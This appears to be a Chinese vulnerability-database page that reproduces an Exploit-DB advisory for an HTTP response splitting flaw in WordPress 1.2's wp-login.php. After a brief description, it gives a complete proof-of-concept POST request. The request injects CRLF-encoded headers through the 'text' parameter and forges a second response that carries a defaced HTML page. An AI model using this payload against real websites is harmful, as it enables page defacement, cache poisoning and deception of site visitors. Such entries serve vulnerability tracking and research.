WordPress 1.2 – ‘wp-login.php’ HTTP Response Splitting

WordPress 1.2 – ‘wp-login.php’ HTTP Response Splitting

漏洞ID 1054710 漏洞类型
发布时间 2004-10-07 更新时间 2004-10-07
图片[1]-WordPress 1.2 – ‘wp-login.php’ HTTP Response Splitting-安全小百科CVE编号 N/A
图片[2]-WordPress 1.2 – ‘wp-login.php’ HTTP Response Splitting-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24667
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11348/info

Wordpress is reported prone to a HTTP response splitting vulnerability. The issue presents itself due to a flaw in the affected script that allows an attacker to manipulate how GET requests are handled.

A remote attacker may exploit this vulnerability to influence or misrepresent how web content is served, cached or interpreted. This could aid in various attacks, which try to entice client users into a false sense of trust.

POST /wp-login.php HTTP/1.0
Host: HOSTNAME
Content-Type: application/x-www-form-urlencoded
Content-length: 226

action=login&mode=profile&log=USER&pwd=PASS&text=
%0d%0aConnection:%20Keep-Alive%0d%0aContent-Length:%20
0%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0aContent-Length:
%2021%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>
*defaced*</html>

相关推荐: Clever’s Games Terminator 3: War of the Machines Remote Client Buffer Overflow Vulnerability

Clever’s Games Terminator 3: War of the Machines Remote Client Buffer Overflow Vulnerability 漏洞ID 1098729 漏洞类型 Boundary Condition …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享